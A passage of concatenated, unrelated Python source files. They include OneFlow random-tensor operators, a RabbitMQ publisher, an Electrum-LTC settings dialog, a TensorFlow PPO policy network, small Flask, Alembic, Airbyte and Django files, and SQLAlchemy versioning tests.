dtype=dtype,
device=device,
generator=generator,
requires_grad=requires_grad,
)
class RandN(Module):
def __init__(
self,
size,
generator=None,
dtype=None,
layout=None,
device=None,
placement=None,
sbp=None,
requires_grad=False,
) -> None:
super().__init__()
self.requires_grad = requires_grad
(
self.size,
self.device,
self.generator,
self.placement,
self.sbp,
) = _rand_op_common_process(size, device, generator, placement, sbp)
self.dtype = dtype
def forward(self):
if self.placement is not None:
res = flow._C.randn(
self.size,
placement=self.placement,
sbp=self.sbp,
dtype=self.dtype,
generator=self.generator,
requires_grad=self.requires_grad,
)
else:
res = flow._C.randn(
self.size,
dtype=self.dtype,
device=self.device,
generator=self.generator,
requires_grad=self.requires_grad,
)
return res
def randn_op(
*size,
out=None,
generator=None,
dtype: Optional[flow.dtype] = None,
layout=None,
device: Union[flow.device, str, None] = None,
placement: flow.placement = None,
sbp: flow._oneflow_internal.sbp.sbp = None,
requires_grad: bool = False
):
"""
Returns a tensor filled with random numbers from a normal distribution with mean 0 and variance 1 (also called the standard normal distribution).
The shape of the tensor is defined by the variable argument ``size``.
Args:
size (int... or oneflow.Size): Defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple or oneflow.Size.
out (optional): The output tensor.
dtype (flow.dtype, optional): The desired data type of returned tensor. Default: ``flow.float32``.
layout (optional): The desired layout of returned Tensor.
generator (flow.Generator, optional): a pseudorandom number generator for sampling
device (flow.device, optional): The desired device of returned local tensor. If None, uses the
current device.
        placement (flow.placement, optional): The desired placement of the returned consistent tensor. If None,
            a local tensor is constructed.
        sbp (flow.sbp, optional): The desired sbp of the returned consistent tensor. Its length must match the
            number of placement dimensions.
requires_grad (bool, optional): If autograd should record operations on the returned tensor. Default: False.
For example:
.. code-block:: python
>>> import oneflow as flow
>>> x = flow.randn(3,3)
>>> x.shape
oneflow.Size([3, 3])
>>> x.is_consistent
False
>>> placement = flow.placement("cpu", {0:[0]})
>>> sbp = flow.sbp.broadcast
>>> x = flow.randn(3,3,placement=placement,sbp=sbp)
>>> x.is_consistent
True
"""
assert out is None, "out not supported yet"
assert layout is None, "layout not supported yet"
if placement is not None:
return flow._C.randn(
size=size,
placement=placement,
sbp=sbp,
dtype=dtype,
generator=generator,
requires_grad=requires_grad,
)
else:
return flow._C.randn(
size=size,
dtype=dtype,
device=device,
generator=generator,
requires_grad=requires_grad,
)
class RandInt(Module):
def __init__(
self,
low: flow.int64,
high: flow.int64,
size: tuple,
generator: flow.Generator = None,
dtype: Optional[flow.dtype] = None,
device=None,
placement=None,
sbp=None,
requires_grad=False,
) -> None:
super().__init__()
assert low < high
self.requires_grad = requires_grad
(
self.size,
self.device,
self.generator,
self.placement,
self.sbp,
) = _rand_op_common_process(size, device, generator, placement, sbp)
self.dtype = dtype
self.low = low
self.high = high
def forward(self):
if self.placement is not None:
res = flow._C.randint(
self.low,
self.high,
size=self.size,
placement=self.placement,
sbp_tuple=self.sbp,
dtype=self.dtype,
generator=self.generator,
requires_grad=self.requires_grad,
)
else:
res = flow._C.randint(
self.low,
self.high,
size=self.size,
dtype=self.dtype,
device=self.device,
generator=self.generator,
requires_grad=self.requires_grad,
)
return res
def randint_op(
low: flow.int64,
high: flow.int64,
size: tuple,
out=None,
generator=None,
dtype: Optional[flow.dtype] = None,
layout=None,
device: Union[flow.device, str, None] = None,
placement: flow.placement = None,
sbp: flow._oneflow_internal.sbp.sbp = None,
requires_grad: bool = False,
):
"""
Returns a tensor filled with random integers generated uniformly between low (inclusive) and high (exclusive).
The shape of the tensor is defined by the variable argument ``size``.
Args:
size (int... or oneflow.Size): Defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple or oneflow.Size.
out (optional): The output tensor.
dtype (flow.dtype, optional): The desired data type of returned tensor. Default: ``flow.int64``.
layout (optional): The desired layout of returned Tensor.
        generator (flow.Generator, optional): a pseudorandom number generator for sampling
device (flow.device, optional): The desired device of returned local tensor. If None, uses the
current device.
        placement (flow.placement, optional): The desired placement of the returned consistent tensor. If None,
            a local tensor is constructed.
        sbp (flow.sbp, optional): The desired sbp of the returned consistent tensor. Its length must match the
            number of placement dimensions.
requires_grad (bool, optional): If autograd should record operations on the returned tensor. Default: False.
For example:
.. code-block:: python
>>> import oneflow as flow
>>> generator = flow.Generator()
>>> generator.manual_seed(0)
>>> flow.randint(0, 5, (3,3), generator=generator)
tensor([[2, 2, 3],
[4, 3, 4],
[2, 4, 2]], dtype=oneflow.int64)
"""
assert out is None, "out not supported yet"
assert layout is None, "layout not supported yet"
if placement is not None:
return flow._C.randint(
low,
high,
size=size,
generator=generator,
dtype=dtype,
placement=placement,
sbp_tuple=sbp,
requires_grad=requires_grad,
)
else:
return flow._C.randint(
low,
high,
size=size,
generator=generator,
dtype=dtype,
device=device,
requires_grad=requires_grad,
)
class RandPerm(Module):
def __init__(
self,
n,
generator: flow.Generator = None,
dtype: Optional[flow.dtype] = None,
layout=None,
device: Union[flow.device, str, None] = None,
placement: flow.placement = None,
sbp: flow._oneflow_internal.sbp.sbp = None,
requires_grad: bool = False,
pin_memory: bool = False,
) -> None:
super().__init__()
assert n >= 0
self.n = n
self.dtype = dtype
(
_,
self.device,
self.generator,
self.placement,
self.sbp,
) = _rand_op_common_process((), device, generator, placement, sbp)
self.requires_grad = requires_grad
def forward(self, out=None):
if self.placement is not None:
res = flow._C.randperm(
self.n,
placement=self.placement,
sbp=self.sbp,
generator=self.generator,
requires_grad=self.requires_grad,
)
else:
res = flow._C.randperm(
self.n,
device=self.device,
generator=self.generator,
requires_grad=self.requires_grad,
)
return res.to(dtype=self.dtype)
def randperm_op(
n: flow.int64,
generator: flow.Generator = None,
out=None,
dtype: Optional[flow.dtype] = None,
layout=None,
device: Union[flow.device, str, None] = None,
placement: flow.placement = None,
sbp: flow._oneflow_internal.sbp.sbp = None,
requires_grad: bool = False,
pin_memory: bool = False,
) -> flow.Tensor:
r"""
Returns a random permutation of integers from ``0`` to ``n - 1``.
Args:
n (int): the upper bound (exclusive)
Keyword args:
generator(:class:`oneflow.Generator`, optional): a pseudorandom number generator for sampling
        out (Tensor, optional): output Tensor, not supported yet.
dtype (:class:`oneflow.dtype`, optional): the desired data type of returned tensor.
Default: ``oneflow.int64``.
layout: layout is not supported yet.
device: the desired device of returned tensor. Default: cpu.
        placement (:class:`flow.placement`, optional): The desired placement of the returned consistent tensor.
            If None, a local tensor is constructed.
        sbp (:class:`flow.sbp`, optional): The desired sbp of the returned consistent tensor. Its length must
            match the number of placement dimensions.
requires_grad(bool, optional): If autograd should record operations on the returned tensor. Default: False.
        pin_memory (bool, optional): pin_memory is not supported yet.
Example:
.. code-block:: python
>>> import oneflow as flow
>>> generator = flow.Generator()
>>> generator.manual_seed(0)
>>> flow.randperm(5, generator=generator)
tensor([2, 4, 3, 0, 1], dtype=oneflow.int64)
"""
assert out is None, "out not supported yet"
assert layout is None, "layout not supported yet"
assert pin_memory is False, "pin_memory not supported yet"
if dtype is None:
dtype = flow.int64
if placement is not None:
return flow._C.randperm(
n=n,
placement=placement,
sbp=sbp,
generator=generator,
requires_grad=requires_grad,
).to(dtype)
else:
return flow._C.randperm(
n=n, device=device, generator=generator, requires_grad=requires_grad
).to(dtype)
if __name__ == "__main__":
import doctest
doctest.testmod(raise_on_error=True)
|
import pika
class PikaPublisher(object):
def __init__(self, exchange_name):
self.exchange_name = exchange_name
self.queue_exists = False
def publish(self, message, routing_key):
conn = pika.AsyncoreConnection(pika.ConnectionParameters(
'127.0.0.1',
credentials=pika.PlainCredentials('guest', 'guest')))
ch = conn.channel()
ch.exchange_declare(exchange=self.exchange_name, type="fanout", durable=False, auto_delete=False)
ch.basic_publish(exchange=self.exchange_name,
routing_key=routing_key,
body=message,
properties=pika.BasicProperties(
content_type = "text/plain",
delivery_mode = 2, # persistent
),
block_on_flow_control = True)
ch.close()
conn.close()
def monitor(self, qname, callback):
conn = pika.AsyncoreConnection(pika.ConnectionParameters(
'127.0.0.1',
credentials=pika.PlainCredentials('guest', 'guest')))
ch = conn.channel()
if not self.queue_exists:
ch.queue_declare(queue=qname, durable=False, exclusive=False, auto_delete=False)
ch.queue_bind(queue=qname, exchange=self.exchange_name)
print "Binding queue %s to exchange %s" % (qname, self.exchange_name)
#ch.queue_bind(queue=qname, exchange=self.exchange_name, routing_key=qname)
self.queue_exists = True
ch.basic_consume(callback, queue=qname)
pika.asyncore_loop()
print 'Close reason:', conn.connection_close
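# Usage sketch (illustrative, not part of the original module). Assumes a local
# RabbitMQ broker on 127.0.0.1 with the default guest/guest credentials; the
# exchange and queue names below are placeholders, and the callback follows the
# classic pre-1.0 pika signature expected by the basic_consume call above.
if __name__ == '__main__':
    def handle_message(channel, method, header, body):
        print "Received:", body

    publisher = PikaPublisher('demo_exchange')
    publisher.publish('hello, world', routing_key='')
    publisher.monitor('demo_queue', handle_message)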
|
#!/usr/bin/env python3
import re
import unicodedata
from glob import glob
patterns = [
'../../Assets/Nova/Fonts/CharsetChinese.txt',
'../../Assets/Resources/Scenarios/*.txt',
'../../Assets/Resources/LocalizedResources/*/Scenarios/*.txt',
'../../Assets/Resources/LocalizedStrings/*.json',
]
out_filename = '../../Assets/Nova/Fonts/Charset.txt'
out_bold_filename = '../../Assets/Nova/Fonts/CharsetBold.txt'
with open(out_filename, 'r', encoding='utf-8') as f:
old_text = f.read().strip('\n')
with open(out_bold_filename, 'r', encoding='utf-8') as f:
old_text_bold = f.read().strip('\n')
text = ''
for pattern in patterns:
for filename in glob(pattern):
print(filename)
with open(filename, 'r', encoding='utf-8') as f:
text += f.read()
bolds = re.compile('<b>(.*?)</b>').findall(text)
text = ''.join(sorted(set(text))).strip('\n')
text_bold = ''.join(sorted(set(''.join(bolds)))).strip('\n')
for c in text:
if unicodedata.category(c)[0] == 'C':
code = f'U+{ord(c):04X}'
print(f'Special character: {code}')
if all(x in old_text for x in text):
print('Need to rebuild font asset: NO')
else:
print('Need to rebuild font asset: YES')
with open(out_filename, 'w', encoding='utf-8', newline='\n') as f:
f.write(text)
if all(x in old_text_bold for x in text_bold):
print('Need to rebuild bold font asset: NO')
else:
print('Need to rebuild bold font asset: YES')
with open(out_bold_filename, 'w', encoding='utf-8', newline='\n') as f:
f.write(text_bold)
|
from kivy.app import App
from kivy.factory import Factory
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from electrum_ltc.util import base_units_list
from electrum_ltc.i18n import languages
from electrum_ltc_gui.kivy.i18n import _
from electrum_ltc.plugins import run_hook
from electrum_ltc import coinchooser
from .choice_dialog import ChoiceDialog
Builder.load_string('''
#:import partial functools.partial
#:import _ electrum_ltc_gui.kivy.i18n._
<SettingsDialog@Popup>
id: settings
title: _('Electrum Settings')
disable_pin: False
use_encryption: False
BoxLayout:
orientation: 'vertical'
ScrollView:
GridLayout:
id: scrollviewlayout
cols:1
size_hint: 1, None
height: self.minimum_height
padding: '10dp'
SettingsItem:
lang: settings.get_language_name()
title: 'Language' + ': ' + str(self.lang)
description: _('Language')
action: partial(root.language_dialog, self)
CardSeparator
SettingsItem:
disabled: root.disable_pin
title: _('PIN code')
description: _("Change your PIN code.")
action: partial(root.change_password, self)
CardSeparator
SettingsItem:
bu: app.base_unit
title: _('Denomination') + ': ' + self.bu
description: _("Base unit for Litecoin amounts.")
action: partial(root.unit_dialog, self)
CardSeparator
SettingsItem:
status: root.fx_status()
title: _('Fiat Currency') + ': ' + self.status
description: _("Display amounts in fiat currency.")
action: partial(root.fx_dialog, self)
CardSeparator
SettingsItem:
status: 'ON' if bool(app.plugins.get('labels')) else 'OFF'
title: _('Labels Sync') + ': ' + self.status
description: _("Save and synchronize your labels.")
action: partial(root.plugin_dialog, 'labels', self)
CardSeparator
SettingsItem:
status: 'ON' if app.use_rbf else 'OFF'
title: _('Replace-by-fee') + ': ' + self.status
description: _("Create replaceable transactions.")
message:
_('If you check this box, your transactions will be marked as non-final,') \
                        + ' ' + _('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') \
+ ' ' + _('Note that some merchants do not accept non-final transactions until they are confirmed.')
action: partial(root.boolean_dialog, 'use_rbf', _('Replace by fee'), self.message)
CardSeparator
SettingsItem:
status: _('Yes') if app.use_unconfirmed else _('No')
title: _('Spend unconfirmed') + ': ' + self.status
description: _("Use unconfirmed coins in transactions.")
message: _('Spend unconfirmed coins')
action: partial(root.boolean_dialog, 'use_unconfirmed', _('Use unconfirmed'), self.message)
CardSeparator
SettingsItem:
status: _('Yes') if app.use_change else _('No')
title: _('Use change addresses') + ': ' + self.status
description: _("Send your change to separate addresses.")
message: _('Send excess coins to change addresses')
action: partial(root.boolean_dialog, 'use_change', _('Use change addresses'), self.message)
# disabled: there is currently only one coin selection policy
#CardSeparator
#SettingsItem:
# status: root.coinselect_status()
# title: _('Coin selection') + ': ' + self.status
# description: "Coin selection method"
# action: partial(root.coinselect_dialog, self)
''')
class SettingsDialog(Factory.Popup):
def __init__(self, app):
self.app = app
self.plugins = self.app.plugins
self.config = self.app.electrum_config
Factory.Popup.__init__(self)
layout = self.ids.scrollviewlayout
layout.bind(minimum_height=layout.setter('height'))
# cached dialogs
self._fx_dialog = None
self._proxy_dialog = None
self._language_dialog = None
self._unit_dialog = None
self._coinselect_dialog = None
def update(self):
self.wallet = self.app.wallet
self.disable_pin = self.wallet.is_watching_only() if self.wallet else True
self.use_encryption = self.wallet.has_password() if self.wallet else False
def get_language_name(self):
return languages.get(self.config.get('language', 'en_UK'), '')
def change_password(self, item, dt):
self.app.change_password(self.update)
def language_dialog(self, item, dt):
if self._language_dialog is None:
l = self.config.get('language', 'en_UK')
def cb(key):
self.config.set_key("language", key, True)
item.lang = self.get_language_name()
self.app.language = key
self._language_dialog = ChoiceDialog(_('Language'), languages, l, cb)
self._language_dialog.open()
def unit_dialog(self, item, dt):
if self._unit_dialog is None:
def cb(text):
self.app._set_bu(text)
item.bu = self.app.base_unit
self._unit_dialog = ChoiceDialog(_('Denomination'), base_units_list,
self.app.base_unit, cb, keep_choice_order=True)
self._unit_dialog.open()
def coinselect_status(self):
return coinchooser.get_name(self.app.electrum_config)
def coinselect_dialog(self, item, dt):
if self._coinselect_dialog is None:
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
def cb(text):
self.config.set_key('coin_chooser', text)
item.status = text
self._coinselect_dialog = ChoiceDialog(_('Coin selection'), choosers, chooser_name, cb)
self._coinselect_dialog.open()
def proxy_status(self):
server, port, protocol, proxy, auto_connect = self.app.network.get_parameters()
        return proxy.get('host') + ':' + proxy.get('port') if proxy else _('None')
def proxy_dialog(self, item, dt):
if self._proxy_dialog is None:
server, port, protocol, proxy, auto_connect = self.app.network.get_parameters()
def callback(popup):
if popup.ids.mode.text != 'None':
proxy = {
'mode':popup.ids.mode.text,
'host':popup.ids.host.text,
'port':popup.ids.port.text,
'user':popup.ids.user.text,
'password':popup.ids.password.text
}
else:
proxy = None
self.app.network.set_parameters(server, port, protocol, proxy, auto_connect)
item.status = self.proxy_status()
popup = Builder.load_file('gui/kivy/uix/ui_screens/proxy.kv')
popup.ids.mode.text = proxy.get('mode') if proxy else 'None'
popup.ids.host.text = proxy.get('host') if proxy else ''
popup.ids.port.text = proxy.get('port') if proxy else ''
popup.ids.user.text = proxy.get('user') if proxy else ''
popup.ids.password.text = proxy.get('password') if proxy else ''
popup.on_dismiss = lambda: callback(popup)
self._proxy_dialog = popup
self._proxy_dialog.open()
def plugin_dialog(self, name, label, dt):
from .checkbox_dialog import CheckBoxDialog
def callback(status):
self.plugins.enable(name) if status else self.plugins.disable(name)
label.status = 'ON' if status else 'OFF'
status = bool(self.plugins.get(name))
dd = self.plugins.descriptions.get(name)
descr = dd.get('description')
fullname = dd.get('fullname')
d = CheckBoxDialog(fullname, descr, status, callback)
d.open()
def fee_status(self):
return self.config.get_fee_status()
def boolean_dialog(self, name, title, message, dt):
from .checkbox_dialog import CheckBoxDialog
CheckBoxDialog(title, message, getattr(self.app, name), lambda x: setattr(self.app, name, x)).open()
def fx_status(self):
fx = self.app.fx
if fx.is_enabled():
source = fx.exchange.name()
ccy = fx.get_currency()
return '%s [%s]' %(ccy, source)
else:
return _('None')
def fx_dialog(self, label, dt):
if self._fx_dialog is None:
from .fx_dialog import FxDialog
def cb():
label.status = self.fx_status()
self._fx_dialog = FxDialog(self.app, self.plugins, self.config, cb)
self._fx_dialog.open()
|
'''
Author: hanyu
Date: 2021-01-06 10:13:41
LastEditTime: 2021-01-09 09:31:12
LastEditors: hanyu
Description: policy network of PPO
FilePath: /test_ppo/examples/PPO_super_mario_bros/policy_graph.py
'''
from ray_helper.miscellaneous import tf_model_ws
def warp_Model():
'''
    description: wrap and return the policy Model class (TensorFlow is imported at call time)
param {*}
return {Object: policy model}
'''
import tensorflow as tf
from infer.categorical import categorical
from utils.get_shape import get_shape
@tf_model_ws
class Model(object):
def __init__(self,
act_space,
rnn,
use_rmc,
use_hrnn,
use_reward_prediction,
after_rnn,
use_pixel_control,
user_pixel_reconstruction,
scope='agent',
**kwargs):
self.act_space = act_space
self.use_rmc = use_rmc
self.use_hrnn = use_hrnn
self.scope = scope
self.s_t = kwargs.get('s')
self.prev_actions = kwargs.get('prev_a')
self.prev_r = kwargs.get('prev_r')
self.state_in = kwargs.get('state_in')
prev_a = tf.one_hot(self.prev_actions,
depth=act_space, dtype=tf.float32)
# Feature Network
self.feature, self.cnn_feature, self.image_feature, self.state_out = self.feature_net(
self.s_t, rnn, prev_a, self.prev_r, self.state_in, scope + '_current_feature')
if use_hrnn:
# TODO
pass
# Actor Network
self.current_act_logits = self.a_net(
self.feature, scope + '_acurrent')
self.current_act = tf.squeeze(
categorical(self.current_act_logits), axis=-1)
# Critic Network
self.current_value = self.v_net(self.feature, scope + '_vcurrent')
advantage = kwargs.get('adv', None)
if advantage is not None:
                # Advantage Normalization
# adv = (adv - adv_mean)
# adv = adv / adv_std
self.old_current_value = kwargs.get('v_cur')
self.ret = advantage + self.old_current_value
self.a_t = kwargs.get('a')
self.behavior_logits = kwargs.get('a_logits')
self.r_t = kwargs.get('r')
self.adv_mean = tf.reduce_mean(advantage, axis=[0, 1])
advantage -= self.adv_mean
self.adv_std = tf.math.sqrt(
tf.reduce_mean(advantage ** 2, axis=[0, 1]))
self.advantage = advantage / tf.maximum(self.adv_std, 1e-12)
self.slots = tf.cast(kwargs.get('slots'), tf.float32)
if use_reward_prediction:
# TODO
# reward prediction network
pass
if user_pixel_reconstruction:
# TODO
                # pixel reconstruction network
pass
if use_pixel_control:
# TODO
# pixel control network
pass
def get_current_act(self):
return self.current_act
def get_current_logits(self):
return self.current_act_logits
def feature_net(self, image, rnn, prev_a, prev_r, state_in, scope='feature'):
'''
description: feature-extraction network
param {
image: the input image
rnn: rnn network
prev_a: previous action
                prev_r: previous reward
state_in: state_in using in rnn
}
return {
Tensor[feature]: the feature input of actor&critic
Tensor[cnn_feature]: the cnn_feature input of reward prediction net
Tensor[image_feature]: the image_feature input of coex adm
Tensor[state_out]: the state_out after feature_net
}
'''
shape = get_shape(image)
with tf.variable_scope(scope, tf.AUTO_REUSE):
image = tf.reshape(image, [-1] + shape[-3:])
filter = [16, 32, 32]
kernel = [(3, 3), (3, 3), (5, 3)]
stride = [(1, 2), (1, 2), (2, 1)]
for i in range(len(filter)):
image = tf.layers.conv2d(
image,
filters=filter[i],
kernel_size=kernel[i][0],
strides=stride[i][0],
padding='valid',
activation=None,
name=f'conv_{i}'
)
image = tf.layers.max_pooling2d(
image,
pool_size=kernel[i][1],
strides=stride[i][1],
padding='valid',
name=f'max_pool_{i}'
)
image = self.residual_block(image, f'res0_{i}')
image = tf.nn.relu(image)
new_shape = get_shape(image)
# the batch_size & seqlen dimensions remain the same
image_feature = tf.reshape(
image, [shape[0], shape[1], new_shape[1], new_shape[2], new_shape[3]])
feature = tf.reshape(
image, [shape[0], shape[1], new_shape[1] * new_shape[2] * new_shape[3]])
cnn_feature = tf.layers.dense(
feature, 256, tf.nn.relu, name='feature')
feature = tf.concat(
[cnn_feature, prev_a, prev_r[:, :, None]], axis=-1)
if self.use_hrnn:
# TODO
pass
elif self.use_rmc:
# TODO
pass
else:
initial_state = tf.split(state_in, 2, axis=-1)
feature, c_out, h_out = rnn(
feature, initial_state=initial_state)
state_out = tf.concat([c_out, h_out], axis=-1)
return feature, cnn_feature, image_feature, state_out
def a_net(self, feature, scope):
'''
description: actor network
param {feature: the output of feature_net}
return {Tensor: the act_logits tensor}
'''
net = feature
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
net = tf.layers.dense(net, get_shape(
feature)[-1], activation=tf.nn.relu, name='dense')
act_logits = tf.layers.dense(
net, self.act_space, activation=None, name='a_logits')
return act_logits
def v_net(self, feature, scope):
'''
description: value network as critic
param {feature: the output of feature_net}
return {Tensor: the v_value tensor}
'''
net = feature
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
net = tf.layers.dense(
net,
get_shape(feature)[-1],
activation=tf.nn.relu,
name='dense'
)
v_value = tf.squeeze(
tf.layers.dense(
net,
1,
activation=None,
name='v_value'
),
axis=-1
)
return v_value
def reconstruct_net(self):
# TODO
pass
def control_net(self):
# TODO
pass
@staticmethod
def residual_block(input, scope):
shape = get_shape(input)
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
last_output = tf.nn.relu(input)
last_output = tf.layers.conv2d(
last_output,
filters=shape[-1],
kernel_size=3,
strides=1,
padding='same',
activation=None,
name='conv0'
)
last_output = tf.nn.relu(last_output)
last_output = tf.layers.conv2d(
last_output,
filters=shape[-1],
kernel_size=3,
strides=1,
padding='same',
activation=None,
name='conv1'
)
output = last_output + input
return output
return Model
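# Usage sketch (illustrative, not part of the original module). warp_Model defers
# the TensorFlow import until call time; a caller is expected to supply an RNN
# cell plus the graph inputs read via kwargs above ('s', 'prev_a', 'prev_r',
# 'state_in', and optionally 'adv', 'v_cur', 'a', 'a_logits', 'r', 'slots').
# graph_inputs below is a placeholder name for that keyword dictionary.
#
#   Model = warp_Model()
#   # model = Model(act_space, rnn, use_rmc, use_hrnn,
#   #               use_reward_prediction, after_rnn, use_pixel_control,
#   #               user_pixel_reconstruction, scope='agent', **graph_inputs)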
|
from flask import Flask, request
app = Flask(__name__)
@app.route('/')
def main():
return """<html>
<head>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.11.1.min.js"></script>
<script>
$(document).ready(function(){
$('#btnSend').click(function(){
$.ajax({
type: 'POST',
url: '/process',
success: function(data){
alert(data);
}
});
});
});
</script>
</head>
<body>
Skillset: <input type="text" name="skillset"><br>
<input type="button" id="btnSend" value="process">
</body>
</html>"""
@app.route('/process', methods=['POST'])
def view_do_something():
if request.method == 'POST':
#your database process here
return "OK"
else:
return "NO OK"
if __name__ == '__main__':
app.run()
|
"""Add Build.family_id
Revision ID: cb99fdfb903
Revises: 1109e724859f
Create Date: 2013-12-23 11:32:17.060863
"""
# revision identifiers, used by Alembic.
revision = 'cb99fdfb903'
down_revision = '1109e724859f'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('build', sa.Column('family_id', sa.GUID(), nullable=True))
op.create_index('idx_build_family_id', 'build', ['family_id'])
def downgrade():
op.drop_index('idx_build_family_id', 'build')
op.drop_column('build', 'family_id')
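# Typical invocation with the Alembic CLI (illustrative; assumes a configured
# alembic.ini pointing at the target database):
#
#   alembic upgrade cb99fdfb903      # apply: adds build.family_id and its index
#   alembic downgrade 1109e724859f   # revert to the previous revision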
|
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
from setuptools import find_packages, setup
MAIN_REQUIREMENTS = ["airbyte-cdk~=0.1.12", "requests_oauthlib~=1.3.0", "pytz~=2021.1", "pendulum~=1.5.1"]
TEST_REQUIREMENTS = [
"pytest~=6.1",
"pytest-mock~=3.6.1",
"jsonschema~=3.2.0",
"responses~=0.13.3",
"freezegun~=1.1.0",
]
setup(
name="source_amazon_ads",
description="Source implementation for Amazon Ads.",
author="Airbyte",
author_email="contact@airbyte.io",
packages=find_packages(),
install_requires=MAIN_REQUIREMENTS,
package_data={"": ["*.json", "schemas/*.json", "schemas/shared/*.json"]},
extras_require={
"tests": TEST_REQUIREMENTS,
},
)
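# Typical local workflow (illustrative):
#
#   pip install -e .             # install the connector with its runtime requirements
#   pip install -e ".[tests]"    # additionally pull in TEST_REQUIREMENTS via the "tests" extra
#   python -m pytest             # run the test suite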
|
"""
ASGI config for suorganizer project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'suorganizer.settings')
application = get_asgi_application()
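# To serve the project with an ASGI server (illustrative; any ASGI server works),
# for example with uvicorn installed:
#
#   uvicorn suorganizer.asgi:application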
|
from sqlalchemy.ext.declarative import declarative_base
from history_meta import VersionedMeta, VersionedListener
from sqlalchemy import create_engine, Column, Integer, String, ForeignKey
from sqlalchemy.orm import clear_mappers, compile_mappers, sessionmaker, deferred
from sqlalchemy.test.testing import TestBase, eq_
from sqlalchemy.test.entities import ComparableEntity
def setup():
global engine
engine = create_engine('sqlite://', echo=True)
class TestVersioning(TestBase):
def setup(self):
global Base, Session
Base = declarative_base(metaclass=VersionedMeta, bind=engine)
Session = sessionmaker(extension=VersionedListener())
def teardown(self):
clear_mappers()
Base.metadata.drop_all()
def create_tables(self):
Base.metadata.create_all()
def test_plain(self):
class SomeClass(Base, ComparableEntity):
__tablename__ = 'sometable'
id = Column(Integer, primary_key=True)
name = Column(String(50))
self.create_tables()
sess = Session()
sc = SomeClass(name='sc1')
sess.add(sc)
sess.commit()
sc.name = 'sc1modified'
sess.commit()
assert sc.version == 2
SomeClassHistory = SomeClass.__history_mapper__.class_
eq_(
sess.query(SomeClassHistory).filter(SomeClassHistory.version == 1).all(),
[SomeClassHistory(version=1, name='sc1')]
)
sc.name = 'sc1modified2'
eq_(
sess.query(SomeClassHistory).order_by(SomeClassHistory.version).all(),
[
SomeClassHistory(version=1, name='sc1'),
SomeClassHistory(version=2, name='sc1modified')
]
)
assert sc.version == 3
sess.commit()
sc.name = 'temp'
sc.name = 'sc1modified2'
sess.commit()
eq_(
sess.query(SomeClassHistory).order_by(SomeClassHistory.version).all(),
[
SomeClassHistory(version=1, name='sc1'),
SomeClassHistory(version=2, name='sc1modified')
]
)
sess.delete(sc)
sess.commit()
eq_(
sess.query(SomeClassHistory).order_by(SomeClassHistory.version).all(),
[
SomeClassHistory(version=1, name='sc1'),
SomeClassHistory(version=2, name='sc1modified'),
SomeClassHistory(version=3, name='sc1modified2')
]
)
def test_from_null(self):
class SomeClass(Base, ComparableEntity):
__tablename__ = 'sometable'
id = Column(Integer, primary_key=True)
name = Column(String(50))
self.create_tables()
sess = Session()
sc = SomeClass()
sess.add(sc)
sess.commit()
sc.name = 'sc1'
sess.commit()
assert sc.version == 2
def test_deferred(self):
"""test versioning of unloaded, deferred columns."""
class SomeClass(Base, ComparableEntity):
__tablename__ = 'sometable'
id = Column(Integer, primary_key=True)
name = Column(String(50))
data = deferred(Column(String(25)))
self.create_tables()
sess = Session()
sc = SomeClass(name='sc1', data='somedata')
sess.add(sc)
sess.commit()
sess.close()
sc = sess.query(SomeClass).first()
assert 'data' not in sc.__dict__
sc.name = 'sc1modified'
sess.commit()
assert sc.version == 2
SomeClassHistory = SomeClass.__history_mapper__.class_
eq_(
sess.query(SomeClassHistory).filter(SomeClassHistory.version == 1).all(),
[SomeClassHistory(version=1, name='sc1', data='somedata')]
)
def test_joined_inheritance(self):
class BaseClass(Base, ComparableEntity):
__tablename__ = 'basetable'
id = Column(Integer, primary_key=True)
name = Column(String(50))
type = Column(String(20))
__mapper_args__ = {'polymorphic_on':type, 'polymorphic_identity':'base'}
class SubClassSeparatePk(BaseClass):
__tablename__ = 'subtable1'
id = Column(Integer, primary_key=True)
base_id = Column(Integer, ForeignKey('basetable.id'))
subdata1 = Column(String(50))
__mapper_args__ = {'polymorphic_identity':'sep'}
class SubClassSamePk(BaseClass):
__tablename__ = 'subtable2'
id = Column(Integer, ForeignKey('basetable.id'), primary_key=True)
subdata2 = Column(String(50))
__mapper_args__ = {'polymorphic_identity':'same'}
self.create_tables()
sess = Session()
sep1 = SubClassSeparatePk(name='sep1', subdata1='sep1subdata')
base1 = BaseClass(name='base1')
same1 = SubClassSamePk(name='same1', subdata2='same1subdata')
sess.add_all([sep1, base1, same1])
sess.commit()
base1.name = 'base1mod'
same1.subdata2 = 'same1subdatamod'
        sep1.name = 'sep1mod'
sess.commit()
BaseClassHistory = BaseClass.__history_mapper__.class_
SubClassSeparatePkHistory = SubClassSeparatePk.__history_mapper__.class_
SubClassSamePkHistory = SubClassSamePk.__history_mapper__.class_
eq_(
sess.query(BaseClassHistory).order_by(BaseClassHistory.id).all(),
[
SubClassSeparatePkHistory(id=1, name=u'sep1', type=u'sep', version=1),
BaseClassHistory(id=2, name=u'base1', type=u'base', version=1),
SubClassSamePkHistory(id=3, name=u'same1', type=u'same', version=1)
]
)
same1.subdata2 = 'same1subdatamod2'
eq_(
sess.query(BaseClassHistory).order_by(BaseClassHistory.id, BaseClassHistory.version).all(),
[
SubClassSeparatePkHistory(id=1, name=u'sep1', type=u'sep', version=1),
BaseClassHistory(id=2, name=u'base1', type=u'base', version=1),
SubClassSamePkHistory(id=3, name=u'same1', type=u'same', version=1),
SubClassSamePkHistory(id=3, name=u'same1', type=u'same', version=2)
]
)
base1.name = 'base1mod2'
eq_(
sess.query(BaseClassHistory).order_by(BaseClassHistory.id, BaseClassHistory.version).all(),
[
SubClassSeparatePkHistory(id=1, name=u'sep1', type=u'sep', version=1),
BaseClassHistory(id=2, name=u'base1', type=u'base', version=1),
